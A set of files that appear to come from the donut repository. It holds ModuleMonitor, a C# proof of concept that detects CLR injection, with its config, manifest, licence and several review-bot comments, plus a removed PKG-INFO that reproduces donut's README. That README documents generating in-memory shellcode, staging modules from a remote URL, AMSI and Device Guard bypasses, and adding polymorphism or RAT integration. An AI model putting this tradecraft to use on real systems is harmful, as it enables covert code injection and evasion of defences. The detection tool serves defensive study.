177 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
178 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
179 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
180
181 Console.WriteLine("{0,15} Additional Information:", "[>]");
182
183 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
184
185 if (process != null)
186 {
187
188 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
189 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
190 }
191 }
192 }
193 }
194 }
195
196 /// <summary>
197 /// Check if the file is a .NET Assembly by cheating and using the Reflection API's PE Parser.
198 ///
199 /// https://stackoverflow.com/questions/36797939/how-to-test-whether-a-file-is-a-net-assembly-in-c-sharp
200 /// </summary>
201 /// <param name="path">The file to check</param>
202 /// <returns>True if a .NET Assembly, false if not. Hopefully.</returns>
203 public static bool IsValidAssembly(string path)
204 {
205 try
206 {
207 // Attempt to resolve the assembly
208 var assembly = System.Reflection.AssemblyName.GetAssemblyName(path);
209 // Nothing blew up, so it's an assembly
210 return true;
211 }
212 catch (Exception ex)
213 {
214 // Something went wrong, it is not an assembly (specifically a
215 // BadImageFormatException will be thrown if it could be found
216 // but it was NOT a valid assembly
217 return false;
218 }
219 }
220
221
222 /// <summary>
223 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace. Optionally filter by module names.
224 /// </summary>
225 /// <param name="filters">A list of module names to filter for.</param>
226 public static void MonitorModuleLoads(List<string> filters)
227 {
228 Console.WriteLine("Monitoring Win32_ModuleLoadTrace...\n");
229
230 while (true)
231 {
232 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
233 Win32_ModuleLoadTrace tracecomp = new Win32_ModuleLoadTrace();
234
235 //Get the details of the next module load
236 trace = GetNextModuleLoad(filters);
237
238 //If the trace is not empty
239 if (!trace.Equals(tracecomp))
240 {
241 Console.WriteLine();
242
243 //Display information from the event
244 Console.WriteLine("[>] Process {0} has loaded a module:", trace.ProcessID);
245 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
246
247 DateTime time = new DateTime();
248 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
249 time.ToLocalTime();
250
251 //TODO: Time is printing strangley
252 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
253 //TODO: Convert to hex
254 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
255 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
256 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
257 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
258 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
259 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
260
261 Console.WriteLine("{0,15} Additional Information:", "[>]");
262
263 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
264
265 if (process != null)
266 {
267
268 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
269 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
270 }
271 }
272 }
273 }
274
275 [DllImport("advapi32.dll", SetLastError = true)]
276 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
277 [DllImport("kernel32.dll", SetLastError = true)]
278 [return: MarshalAs(UnmanagedType.Bool)]
279 private static extern bool CloseHandle(IntPtr hObject);
280
281 /// <summary>
282 /// Gets the owner of a process.
283 ///
284 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
285 /// </summary>
286 /// <param name="process">The process to inspect.</param>
287 /// <returns>The name of the user, or null if it could not be read.</returns>
288 public static string GetProcessUser(Process process)
289 {
290 IntPtr processHandle = IntPtr.Zero;
291 try
292 {
293 OpenProcessToken(process.Handle, 8, out processHandle);
294 WindowsIdentity wi = new WindowsIdentity(processHandle);
295 return wi.Name;
296 }
297 catch (Exception ex)
298 {
299 return ex.Message;
300 }
301 finally
302 {
303 if (processHandle != IntPtr.Zero)
304 {
305 CloseHandle(processHandle);
306 }
307 }
308 }//end method
309
310
311 /// <summary>
312 /// Try to get the process by ID and return null if it no longer exists.
313 /// </summary>
314 /// <param name="id"></param>
315 /// <returns></returns>
316 private static Process SafeGetProcessByID(int id)
317 {
318 try
319 {
320 return Process.GetProcessById(id);
321
322 }
323 catch
324 {
325 return null;
326 }
327 }
328
329 private static void PrintUsage()
330 {
331 Console.WriteLine();
332 Console.WriteLine("| Module Monitor [v0.1]");
333 Console.WriteLine("| Copyright (c) 2019 TheWover");
334 Console.WriteLine();
335
336 Console.WriteLine("Usage: ModuleMonitor.exe [--clr-sentry]");
337 Console.WriteLine();
338
339 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
340 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--clr-sentry", "Monitor for CLR injection.");
341 Console.WriteLine();
342
343 Console.WriteLine("Examples:");
344 Console.WriteLine();
345
346 Console.WriteLine("ModuleMonitor.exe");
347 Console.WriteLine("ModuleMonitor.exe --clr-monitor");
348 Console.WriteLine();
349 }
350 }//end class
351 }//end namespace
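Review bot: `IsValidAssembly(proc.StartInfo.FileName)` in CLRSentry does not test the process image: for a Process obtained through GetProcessById, StartInfo is (per the documented behaviour) not populated, so FileName is empty, GetAssemblyName throws, and every process that loads an `msco*` module is reported as CLR injection, genuine .NET programs included. The `Process.GetProcessById` call on the line before is also outside any try, so a process that exits between the event and the lookup throws and terminates the sentry loop, although `SafeGetProcessByID` already exists further down; use the main module path and tolerate lookup failures as sketched below. Separately, each `GetNextModuleLoad` call creates a new `ManagementEventWatcher` that is never stopped or disposed, so subscriptions pile up and loads that fire between one `WaitForNextEvent` returning and the next watcher being created are presumably not seen. `TIME_CREATED` looks like a FILETIME, so `DateTime.FromFileTimeUtc((long)trace.TIME_CREATED)` would likely resolve the "time is printing strangely" TODO (the result of `time.ToLocalTime()` is also discarded), and the usage example `--clr-monitor` should read `--clr-sentry`.
```csharp
// … unchanged: loop header and the "msco" file-name check …
Process proc = SafeGetProcessByID((int)trace.ProcessID);
if (proc == null)
    continue;   // already exited; nothing left to classify

string imagePath;
try
{
    // MainModule is the executable actually running; StartInfo is only
    // filled in for processes this program started itself.
    imagePath = proc.MainModule.FileName;
}
catch (Exception)
{
    continue;   // access denied or bitness mismatch; cannot classify
}

if (!IsValidAssembly(imagePath))
{
    // … unchanged: report the detection …
}
```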
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ModuleMonitor")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ModuleMonitor")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("361c69f5-7885-4931-949a-b91eeab170e3")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # ModuleMonitor
1
2 Has its own repo at: https://github.com/TheWover/ModuleMonitor
3
4 Uses WMI Event Win32_ModuleLoadTrace to monitor module loading. Provides filters, and detailed data. Has an option to monitor for CLR Injection attacks.
5
6 The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
7
8 While useful, there are both false positives and false negatives:
9
10 * False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
11 * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
12
13 Please Note: This is intended only as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. You perform the same logic with the ``` Image Load ``` event for Sysmon or ETW. They would be easier to scale and integrate with enterprise tooling.
14
15 ![Alt text](https://github.com/TheWover/donut/blob/master/ModuleMonitor/img/detected.png?raw=true "CLR Sentry detection")
16
17 # Usage
18
19 ```
20 | Module Monitor [v0.1]
21 | Copyright (c) 2019 TheWover
22
23 Usage: ModuleMonitor.exe [--clr-sentry]
24
25 ```
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/></startup></configuration>
0 <?xml version="1.0" encoding="utf-8"?>
1 <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
2 <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
3 <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
4 <security>
5 <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
6 <!-- UAC Manifest Options
7 If you want to change the Windows User Account Control level replace the
8 requestedExecutionLevel node with one of the following.
9
10 <requestedExecutionLevel level="asInvoker" uiAccess="false" />
11 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
12 <requestedExecutionLevel level="highestAvailable" uiAccess="false" />
13
14 Specifying requestedExecutionLevel element will disable file and registry virtualization.
15 Remove this element if your application requires this virtualization for backwards
16 compatibility.
17 -->
18 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
19 </requestedPrivileges>
20 </security>
21 </trustInfo>
22
23 <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
24 <application>
25 <!-- A list of the Windows versions that this application has been tested on
26 and is designed to work with. Uncomment the appropriate elements
27 and Windows will automatically select the most compatible environment. -->
28
29 <!-- Windows Vista -->
30 <!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
31
32 <!-- Windows 7 -->
33 <!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
34
35 <!-- Windows 8 -->
36 <!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
37
38 <!-- Windows 8.1 -->
39 <!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
40
41 <!-- Windows 10 -->
42 <!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
43
44 </application>
45 </compatibility>
46
47 <!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
48 DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
49 to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
50 also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
51 <!--
52 <application xmlns="urn:schemas-microsoft-com:asm.v3">
53 <windowsSettings>
54 <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
55 </windowsSettings>
56 </application>
57 -->
58
59 <!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
60 <!--
61 <dependency>
62 <dependentAssembly>
63 <assemblyIdentity
64 type="win32"
65 name="Microsoft.Windows.Common-Controls"
66 version="6.0.0.0"
67 processorArchitecture="*"
68 publicKeyToken="6595b64144ccf1df"
69 language="*"
70 />
71 </dependentAssembly>
72 </dependency>
73 -->
74
75 </assembly>
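Review bot: `requestedExecutionLevel level="requireAdministrator"` is set with no note on why a module-load monitor needs full administrator rights, and `assemblyIdentity name="MyApplication.app"` is still the Visual Studio template placeholder. Set the identity to `ModuleMonitor.app` and add a comment above the element such as `<!-- Administrator is needed to subscribe to the Win32_ModuleLoadTrace WMI event and to open other users' process tokens -->` — assuming that is the reason, which the manifest alone cannot confirm. Documenting it lets a reviewer judge whether `highestAvailable` would do.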
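--- a/PKG-INFO
+++ /dev/null
@@ -1,264 +0,0 @@
-Metadata-Version: 2.1
-Name: donut-shellcode
-Version: 0.9.2
-Summary: Donut Python C extension
-Home-page: https://github.com/TheWover/donut
-Author: TheWover, Odzhan, byt3bl33d3r
-License: UNKNOWN
-Description: # Using Donut
-
-![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
-
-Version: 0.9.2 *please submit issues and requests for v1.0 release*
-
-Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
-
-TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
-
-v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
-
-## Introduction
-
-Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
-
-It can be used in several ways.
-
-## As a Standalone Tool
-
-Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
-
-```
-
-usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
-
--MODULE OPTIONS-
-
--f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
--u <URL> HTTP server that will host the donut module.
-
--PIC/SHELLCODE OPTIONS-
-
--a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
--b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
--o <payload> Output file. Default is "payload.bin"
-
--DOTNET OPTIONS-
-
--c <namespace.class> Optional class name. (required for .NET DLL)
--m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
--p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
--r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
--d <name> AppDomain name to create for .NET. Randomly generated by default.
-
-examples:
-
-donut -f c2.dll
-donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
-donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
-
-```
-
-### Building Donut
-
-Tags have been provided for each release version of donut that contain the compiled executables.
-
-* v0.9.2, Bear Claw:
-* v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
-* v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
-* v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
-
-However, you may also clone and build the source yourself using the provided makefiles.
-
-## Building From Repository
-
-From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
-
-```
-git clone http://github.com/thewover/donut
-cd donut
-```
-
-## Linux
-
-Simply run make to generate an executable, static and dynamic libraries.
-
-```
-make
-make clean
-make debug
-```
-
-## Windows
-
-Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
-
-```
-nmake -f Makefile.msvc
-nmake clean -f Makefile.msvc
-nmake debug -f Makefile.msvc
-```
-
-## As a Library
-
-donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
-
-## As a Python Module
-
-Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
-
-```
-pip install .
-```
-
-Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
-
-```
-pip install donut-shellcode
-```
-
-## As a Template - Rebuilding the shellcode
-
-*payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
-
-### Microsoft Visual Studio
-
-**Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
-
-Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
-
-```
-nmake clean -f Makefile.msvc
-nmake -f Makefile.msvc
-```
-
-This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
-
-To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
-
-```
-nmake clean -f Makefile.msvc
-nmake x86 -f Makefile.msvc
-```
-
-This will save the shellcode as a C array to *payload_exe_x86.h*.
-
-### Mingw-w64
-
-Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
-
-```
-make clean -f Makefile.mingw
-make -f Makefile.mingw
-```
-
-Once you've recompiled for all architectures, you may rebuild donut.
-
-## Bypasses
-
-Donut includes a bypass system for AMSI and other security features. Currently we bypass:
-
-* AMSI in .NET v4.8
-* Device Guard policy preventing dynamicly generated code from executing
-
-You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
-
-Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
-
-Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
-
-Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
-
-If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
-
-Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
-
-### Additional features.
-
-These are left as exercises to the reader. I would personally recommend:
-
-* Add environmental keying
-* Make donut polymorphic by obfuscating *payload* every time shellcode is generated
-* Integrate donut as a module into your favorite RAT/C2 Framework
-
-## Disclaimers
-
-* No, we will not update donut to counter signatures or detections by any AV.
-* We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
-
-# How it works
-
-## Procedure for Assemblies
-
-Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
-
-The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
-
-Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
-
-For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
-
-Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
-
-## Procedure for ActiveScript/XSL
-
-The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
-
-## Procedure for PE Loading
-
-The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
-
-## Components
-
-Donut contains the following elements:
-
-* donut.c: The source code for the donut payload generator
-* donut.exe: The compiled payload generator as an EXE
-* donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
-* donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
-* setup.py: The setup file for installing Donut as a Pip Python3 module.
-* lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
-* lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
-* lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
-* payload/payload.c: Main file for the shellcode.
-* payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
-* payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
-* payload/inmem_xml.c: In-Memory loader for XSL/XML files.
-* payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
-* payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
-* payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
-* payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
-* payload/http_client.c: Downloads a module from remote staging server into memory.
-* payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
-* payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
-* payload/inject.exe: The compiled C shellcode injector
-* payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
-* payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
-* payload/runsc.exe: The compiled C shellcode runner
-* payload/exe2h/exe2h.c: Source code for exe2h
-* payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
-* encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
-* hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
-
-# Subprojects
-
-There are three companion projects provided with donut:
-
-* DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
-* DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
-* ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
-* ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
-
-# Project plan
-
-* ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
-* Create a C# version of the generator.
-* Create a donut.py generator that uses the same command-line parameters as donut.exe.
-* Add support for HTTP proxies.
-~~* Find ways to simplify the shellcode if possible.~~
-* Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
-* ~~Dynamic Calls to DLL functions.~~
-* Handle the ProcessExit event from AppDomain using unmanaged code.
-
-Platform: UNKNOWN
-Requires-Python: >=3.0
-Description-Content-Type: text/markdown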
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3
4 <supportedRuntime version="v2.0.50727"/></startup>
5 </configuration>
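Review bot: Listing only `<supportedRuntime version="v2.0.50727"/>` means the executable will not start on a host where .NET Framework 3.5 is not enabled (the loader shows the "install .NET 3.5" prompt instead of falling back), which is the default state on current Windows 10/11 images and is exactly the kind of box a process-discovery tool gets dropped onto. If the CLR 2.0 floor is deliberate, add a fallback entry after the existing one, `<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>`, so the tool runs under CLR 4 when CLR 2 is absent while still preferring v2.0 where it is present. Worth confirming the 3.5 target is intentional rather than template residue.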
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{98CA74C7-A074-434D-9772-75896E73CEAA}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ProcessManager</RootNamespace>
9 <AssemblyName>ProcessManager</AssemblyName>
10 <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 <Prefer32Bit>false</Prefer32Bit>
26 </PropertyGroup>
27 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
28 <PlatformTarget>AnyCPU</PlatformTarget>
29 <DebugType>pdbonly</DebugType>
30 <Optimize>true</Optimize>
31 <OutputPath>bin\Release\</OutputPath>
32 <DefineConstants>TRACE</DefineConstants>
33 <ErrorReport>prompt</ErrorReport>
34 <WarningLevel>4</WarningLevel>
35 <Prefer32Bit>false</Prefer32Bit>
36 </PropertyGroup>
37 <ItemGroup>
38 <Reference Include="System" />
39 <Reference Include="System.Core" />
40 <Reference Include="System.Management" />
41 <Reference Include="System.Xml.Linq" />
42 <Reference Include="System.Data.DataSetExtensions" />
43 <Reference Include="Microsoft.CSharp" />
44 <Reference Include="System.Data" />
45 <Reference Include="System.Net.Http" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="App.config" />
54 </ItemGroup>
55 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
56 </Project>
